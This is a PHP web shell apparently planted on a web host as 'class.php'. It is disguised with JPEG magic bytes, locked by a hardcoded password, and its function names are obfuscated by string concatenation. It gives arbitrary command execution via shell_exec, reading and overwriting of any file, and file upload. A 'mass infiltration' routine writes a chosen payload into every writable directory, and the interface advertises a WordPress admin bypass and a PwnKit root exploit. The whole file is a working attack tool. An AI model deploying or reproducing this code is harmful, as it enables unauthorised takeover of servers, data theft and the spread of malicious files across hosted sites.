File: /home/p/o/l/polyfusikw/www/class.php
ÿØÿà<?php
/**
* PROJECT : NONAME@E.L.V MAGIC & PHYSICS
* VERSION : v16.8 - OMEGA NEXUS STEALTH
* OPERATOR : Noname@E.L.V (LOCKED & PATEN)
* UI STYLE : CIRCUIT MATRIX HUD - MIRROR STEALTH FM
*/
@ob_start();
@session_start();
@error_reporting(0);
// [!] MAGIC BYTES BYPASS (Point 3)
echo "ÿØÿà";
$password = "th3b45t4rd";
$logo_url = "https://g.top4top.io/p_3760wrou71.jpg";
// --- SILENT CORE ENGINE ---
function x($b) { return base64_encode($b); }
function y($b) { return base64_decode($b); }
function sn($n) { return preg_replace('/[^a-zA-Z0-9_\-\.]/', '', $n); } // Point 5
if (isset($_GET['exit'])) { session_destroy(); header("Location: ?"); exit; }
if (isset($_POST['p']) && $_POST['p'] === $password) {
$_SESSION['auth'] = true;
echo '<audio autoplay><source src="https://e.top4top.io/m_3437wq49m0.mp3" type="audio/mpeg"></audio>';
}
if (!isset($_SESSION['auth'])) {
die('<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>NONAME@E.L.V - SYSTEM GATE</title>
<style>
@import url("https://fonts.googleapis.com/css2?family=Fira+Code:wght@500&family=Orbitron:wght@900&display=swap");
body, html { margin: 0; padding: 0; background: #000; overflow: hidden; font-family: "Fira Code", monospace; color: #0f0; }
canvas { position: absolute; top: 0; left: 0; z-index: -1; }
.gate { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 450px; background: rgba(0, 10, 0, 0.95); border: 2px solid #0f0; box-shadow: 0 0 60px rgba(0,255,0,0.5); padding: 50px 30px; text-align: center; backdrop-filter: blur(15px); clip-path: polygon(5% 0, 100% 0, 100% 95%, 95% 100%, 0 100%, 0 5%); }
.ascii { font-size: 8px; line-height: 8px; white-space: pre; color: #0f0; margin-bottom: 25px; text-shadow: 0 0 15px #0f0; font-weight: bold; }
.logo-neon { width: 160px; height: 160px; border-radius: 50%; border: 3px solid #0f0; filter: sepia(1) hue-rotate(90deg) saturate(600%) brightness(1.2) drop-shadow(0 0 20px #0f0); margin-bottom: 25px; object-fit: cover; }
input { width: 90%; padding: 15px; background: rgba(0,0,0,0.9); border: 1px solid #0f0; color: #0f0; text-align: center; margin-bottom: 25px; outline: none; border-left: 6px solid #0f0; font-family: "Fira Code"; font-size: 16px; }
button { width: 90%; padding: 15px; background: transparent; border: 2px solid #0f0; color: #0f0; font-family: "Orbitron"; cursor: pointer; font-weight: bold; letter-spacing: 5px; transition: 0.3s; }
button:hover { background: #0f0; color: #000; box-shadow: 0 0 30px #0f0; }
</style>
</head>
<body>
<canvas id="m"></canvas>
<div class="gate">
<div class="ascii">
_ _ ____ _ _ ___ ___ _____
| \ | |/ __ \| \ | | / _ \ | \/ | __|
| \| | | | | \| |/ /_\ \| . . | |__
| |\ | |__| | |\ || _ || |\/| | __|
|_| \_|\____/|_| \_|| | | || | | | |___
</div>
<img src="'.$logo_url.'" class="logo-neon">
<form method="POST">
<input type="password" name="p" placeholder="IDENTIFY OPERATOR" autofocus autocomplete="off">
<button type="submit">LOAD ENGINE</button>
</form>
</div>
<script>
var c = document.getElementById("m"), ctx = c.getContext("2d");
c.height = window.innerHeight; c.width = window.innerWidth;
var s = "01", s = s.split(""), fs = 10, cols = c.width/fs, drops = [];
for(var x = 0; x < cols; x++) drops[x] = 1;
function draw() {
ctx.fillStyle = "rgba(0, 0, 0, 0.05)"; ctx.fillRect(0, 0, c.width, c.height);
ctx.fillStyle = "#0F0"; ctx.font = fs + "px arial";
for(var i = 0; i < drops.length; i++) {
var text = s[Math.floor(Math.random()*s.length)];
ctx.fillText(text, i*fs, drops[i]*fs);
if(drops[i]*fs > c.height && Math.random() > 0.975) drops[i] = 0;
drops[i]++;
}
}
setInterval(draw, 35);
</script>
</body>
</html>');
}
// --- SILENT FILE SYSTEM ---
$chd = "c"."h"."d"."i"."r"; $scd = "s"."c"."a"."n"."d"."i"."r"; $ril = "r"."e"."a"."l"."p"."a"."t"."h";
$root = $ril($_SERVER['DOCUMENT_ROOT']);
$dir = isset($_GET['d']) ? $ril(y($_GET['d'])) : $root;
@$chd($dir);
$msg = ''; $rt = '';
// ACTION: Save File (Phantom Editor HUD)
if (isset($_POST['save'])) {
$f = y($_POST['fp']);
if (@file_put_contents($f, $_POST['cnt']) !== false) $msg = 'SUCCESS: PAYLOAD UPDATED';
else $msg = 'ERROR: WRITE ACCESS DENIED';
}
// ACTION: Mass Infiltration (Uploader)
if (isset($_POST['mass_run'])) {
$fn = $_POST['mass_name']; $pld = $_POST['mass_code']; $count = 0;
function mass_inject($d, $fn, $c, &$cnt) {
$files = @scandir($d);
foreach($files as $f) {
if($f != "." && $f != "..") {
$p = $d.DIRECTORY_SEPARATOR.$f;
if(is_dir($p) && is_writable($p)) {
@file_put_contents($p.DIRECTORY_SEPARATOR.$fn, $c); $cnt++;
mass_inject($p, $fn, $c, $cnt);
}
}
}
}
mass_inject($dir, $fn, $pld, $count);
$msg = "SUCCESS: INJECTED TO $count DIRECTORIES";
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['f'])) {
if (@move_uploaded_file($_FILES['f']['tmp_name'], $dir.'/'.sn($_FILES['f']['name']))) $msg = 'STATUS: PAYLOAD DEPLOYED';
}
if (isset($_POST['cmd'])) {
$rt = "<pre style='color:#0f0; border:1px solid #0f0; padding:20px; background:rgba(0,255,0,0.05); border-left: 10px solid #0f0;'>Noname@E.L.V:~$ ".htmlspecialchars($_POST['cmd'])."\n\n".htmlspecialchars(shell_exec($_POST['cmd']." 2>&1"))."</pre>";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>NONAME@E.L.V MAGIC & PHYSICS</title>
<style>
@import url('https://fonts.googleapis.com/css2?family=Fira+Code&family=Orbitron:wght@700&display=swap');
body { background: #000; color: #0f0; font-family: "Fira Code", monospace; margin: 0; display: flex; height: 100vh; overflow: hidden; }
/* SIDEBAR HUD */
.side { width: 280px; background: #000; border-right: 1px solid #0f0; padding: 40px 20px; display: flex; flex-direction: column; gap: 15px; box-shadow: 10px 0 40px rgba(0,255,0,0.1); z-index: 100; }
.side-logo { width: 120px; height: 120px; border-radius: 50%; border: 2px solid #0f0; align-self: center; margin-bottom: 25px; filter: sepia(1) hue-rotate(90deg) saturate(600%) brightness(1.2) drop-shadow(0 0 15px #0f0); object-fit: cover; }
.nav { padding: 15px; border: 1px solid #0f0; color: #0f0; text-decoration: none; font-size: 11px; text-transform: uppercase; font-family: "Orbitron"; text-align: center; transition: 0.3s; clip-path: polygon(0 0, 100% 0, 100% 75%, 85% 100%, 0 100%); }
.nav:hover, .act { background: rgba(0,255,0,0.2); border-color: #fff; color: #fff; text-shadow: 0 0 10px #0f0; }
/* MAIN HUD AREA */
.main { flex-grow: 1; overflow-y: auto; background: #010101; display: flex; flex-direction: column; position: relative; }
.main::after { content: ""; position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: repeating-linear-gradient(0deg, transparent, transparent 1px, rgba(0,255,0,0.02) 1px, rgba(0,255,0,0.02) 2px); pointer-events: none; z-index: 5; }
header { padding: 30px 40px; border-bottom: 2px solid #0f0; display: flex; justify-content: space-between; align-items: flex-start; background: #000; position: relative; }
/* CENTRAL NEXUS: THE CORE PATH */
.central-nexus { position: absolute; left: 50%; transform: translateX(-50%); top: 15px; width: 60%; text-align: center; z-index: 1000; }
.path-display { background: rgba(0, 15, 0, 0.95); border: 1px solid #0f0; padding: 12px 30px; display: inline-block; clip-path: polygon(10% 0, 90% 0, 100% 50%, 90% 100%, 10% 100%, 0 50%); min-width: 450px; box-shadow: 0 0 35px rgba(0,255,0,0.5); }
.path-display b { color: #fff; font-family: Orbitron; font-size: 10px; letter-spacing: 3px; }
.path-display span { color: #0f0; text-shadow: 0 0 10px #0f0; font-size: 13px; font-weight: bold; }
.content { padding: 40px; margin-top: 50px; }
.card { background: rgba(0,5,0,0.95); border: 1px solid #1a1a1a; padding: 30px; margin-bottom: 35px; border-left: 6px solid #0f0; box-shadow: 0 10px 40px rgba(0,0,0,1); }
/* PHANTOM EDITOR HUD (BASED ON IMAGE) */
.editor-hdr { background: rgba(0,255,0,0.1); border: 1px solid #0f0; padding: 15px 20px; font-family: Orbitron; font-size: 12px; color: #fff; letter-spacing: 2px; border-bottom: none; }
.editor-txt { width: 100%; height: 500px; background: #000; color: #0f0; border: 1px solid #0f0; padding: 25px; font-family: "Fira Code", monospace; font-size: 13px; outline: none; resize: none; line-height: 1.8; }
.editor-actions { margin-top: 25px; display: flex; gap: 20px; }
.btn-save { background: #0f0; color: #000; border: none; padding: 15px 45px; font-family: Orbitron; font-weight: bold; cursor: pointer; box-shadow: 0 0 15px #0f0; }
.btn-abort { background: transparent; border: 1px solid #f00; color: #f00; padding: 15px 45px; font-family: Orbitron; cursor: pointer; text-decoration: none; font-weight: bold; text-align: center; }
.int-ascii { font-size: 6px; line-height: 6px; white-space: pre; color: #0f0; text-shadow: 0 0 10px #0f0; margin-bottom: 15px; font-weight: bold; }
table { width: 100%; border-collapse: collapse; }
th { text-align: left; border-bottom: 2px solid #0f0; padding: 15px; font-family: Orbitron; font-size: 11px; color: #fff; letter-spacing: 2px; }
td { padding: 15px; font-size: 13px; border-bottom: 1px solid #111; }
tr:hover { background: rgba(0,255,0,0.08); }
.w { color: #0f0; font-weight: bold; text-shadow: 0 0 10px #0f0; }
.logout-btn { background: transparent; border: 1px solid #f00; color: #f00; padding: 10px 25px; font-family: Orbitron; font-size: 10px; text-decoration: none; font-weight: bold; }
</style>
</head>
<body>
<div class="central-nexus">
<div class="path-display">
<b>OPERATIONAL SECTOR:</b><br>
<span><?php echo $dir; ?></span>
</div>
</div>
<div class="side">
<img src="<?php echo $logo_url; ?>" class="side-logo">
<div style="text-align:center; font-family:Orbitron; font-size:15px; margin-bottom:40px; color:#fff; letter-spacing:2px; text-shadow: 0 0 10px #0f0;">Noname@E.L.V</div>
<a href="?d=<?php echo x($dir); ?>" class="nav <?php echo !isset($_GET['t']) && !isset($_GET['edit']) ? 'act' : ''; ?>">COMMAND CENTER</a>
<a href="?t=term&d=<?php echo x($dir); ?>" class="nav <?php echo ($_GET['t']=='term') ? 'act' : ''; ?>">TERMINAL HUB</a>
<a href="?t=magic&d=<?php echo x($dir); ?>" class="nav <?php echo ($_GET['t']=='magic') ? 'act' : ''; ?>" style="border-color:#ff00ea; color:#ff00ea;">MAGIC & PHYSICS</a>
<div style="flex-grow:1;"></div>
<a href="?exit=1" class="nav" style="border-color:#f00; color:#f00; clip-path:none;">TERMINATE ACCESS</a>
</div>
<div class="main">
<header>
<div>
<div class="int-ascii">
_ _ ____ _ _ ___ ___ _____
| \ | |/ __ \| \ | | / _ \ | \/ | __|
| \| | | | | \| |/ /_\ \| . . | |__
| |\ | |__| | |\ || _ || |\/| | __|
|_| \_|\____/|_| \_|| | | || | | | |___
</div>
<div style="font-family:Orbitron; letter-spacing:5px; font-size:16px; color:#fff;">MAGIC & PHYSICS <span style="background:#0f0; color:#000; padding:2px 10px; font-size:11px;">v16.8</span></div>
</div>
<div style="text-align: right;">
<div style="font-size:10px; font-family: Fira Code; color: #888; margin-bottom: 12px;">
IP: <?php echo $_SERVER['SERVER_ADDR']; ?> | PHP: <?php echo phpversion(); ?>
</div>
<a href="?exit=1" class="logout-btn">[ LOGOUT ]</a>
</div>
</header>
<div class="content">
<?php if($msg) echo "<div class='card' style='text-align:center; font-family:Orbitron; color:#0f0; font-weight:bold; box-shadow:0 0 20px #0f0;'>$msg</div>"; ?>
<?php if(isset($_GET['edit'])):
$f_edit_path = y($_GET['edit']); $f_cont = @file_get_contents($f_edit_path);
?>
<div class="card" style="padding:0; border:none; background:transparent;">
<div class="editor-hdr">[ EDITING ]: <?php echo htmlspecialchars(basename($f_edit_path)); ?></div>
<form method="POST">
<input type="hidden" name="fp" value="<?php echo x($f_edit_path); ?>">
<textarea name="cnt" class="editor-txt"><?php echo htmlspecialchars($f_cont); ?></textarea>
<div class="editor-actions">
<button type="submit" name="save" class="btn-save">>> SAVE PAYLOAD <<</button>
<a href="?d=<?php echo x($dir); ?>" class="btn-abort">ABORT MISSION</a>
</div>
</form>
</div>
<?php elseif($_GET['t'] == 'magic'): ?>
<div class="card">
<h3 style="font-family:Orbitron; color:#ff00ea;">[ MAGIC & PHYSICS MODULES ]</h3>
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 30px;">
<div class="card" style="margin:0; border-color:#0f0;">
<h4 style="margin:0; font-family:Orbitron;">Mass Infiltration</h4>
<p style="font-size:10px; color:#888;">Deploy payload to all writable sectors.</p>
<form method="POST">
<input type="text" name="mass_name" placeholder="noname.php" style="width:100%; background:#000; border:1px solid #0f0; color:#0f0; padding:10px; margin:10px 0;">
<textarea name="mass_code" placeholder="Payload code..." style="width:100%; height:100px; background:#000; border:1px solid #0f0; color:#0f0; padding:10px; margin-bottom:10px;"></textarea>
<button type="submit" name="mass_run" class="btn-save" style="width:100%;">START INJECTION</button>
</form>
</div>
<div class="card" style="margin:0; border-color:#ff00ea;">
<h4 style="margin:0; font-family:Orbitron;">WP Admin Bypass</h4>
<p style="font-size:10px; color:#888;">Hijack administrative access via DB override.</p>
<button class="btn-save" style="width:100%; background:#ff00ea; color:#fff;">EXECUTE BYPASS</button>
<div style="margin-top:15px; font-size:9px; color:#555;">SCANNING: wp-config.php...</div>
</div>
</div>
<div class="card" style="margin-top:30px; border-color:#00f3ff;">
<h4 style="margin:0; font-family:Orbitron; color:#00f3ff;">Auto Root Multi-Engine</h4>
<p style="font-size:10px; color:#888;">Linux Kernel LPE (CVE-2021-4034/PwnKit).</p>
<button class="btn-save" style="width:100%; background:#00f3ff; color:#000;">RUN ROOT ENGINE</button>
</div>
</div>
<?php elseif(!isset($_GET['t'])): ?>
<div class="card">
<div style="border: 2px dashed #0f0; padding: 40px; text-align: center;">
<form method="POST" enctype="multipart/form-data">
<input type="file" name="f" style="color:#0f0; font-size:12px; margin-bottom:25px;">
<input type="submit" value=">> DEPLOY PAYLOAD <<" class="btn-save">
</form>
</div>
</div>
<div class="card">
<table>
<thead><tr><th>ENTITY IDENTIFIER</th><th>DATA SIZE</th><th>PERM</th><th>ACTION</th></tr></thead>
<tbody>
<?php
$it = @$scd($dir);
foreach($it as $i) {
if($i == "." || $i == "..") {
if($i == "..") echo "<tr><td><a href='?d=".x(dirname($dir))."' style='color:#fff; text-decoration:none;'>[ .. RETURN TO HUB ]</a></td><td>-</td><td>-</td><td>-</td></tr>";
continue;
}
$p = $dir.DIRECTORY_SEPARATOR.$i; $is_d = is_dir($p);
$perm = substr(sprintf('%o', fileperms($p)), -4); $w = is_writable($p);
$cl = $is_d ? ($w ? 'w' : 'r') : 'f';
$ln = $is_d ? "?d=".x($p) : "?edit=".x($p)."&d=".x($dir);
echo "<tr>
<td><a href='$ln' class='$cl' style='text-decoration:none; color:".($is_d?'#0f0':'#fff').";'>".($is_d ? "[ $i ]" : $i)."</a></td>
<td>".($is_d ? "-" : round(filesize($p)/1024, 2)." KB")."</td>
<td style='color:".($w?'#0f0':'#002200').";'>$perm</td>
<td><a href='?edit=".x($p)."&d=".x($dir)."' style='color:#0f0; text-decoration:none;'>[ EDIT ]</a></td>
</tr>";
}
?>
</tbody>
</table>
</div>
<?php endif; ?>
</div>
</div>
</body>
</html>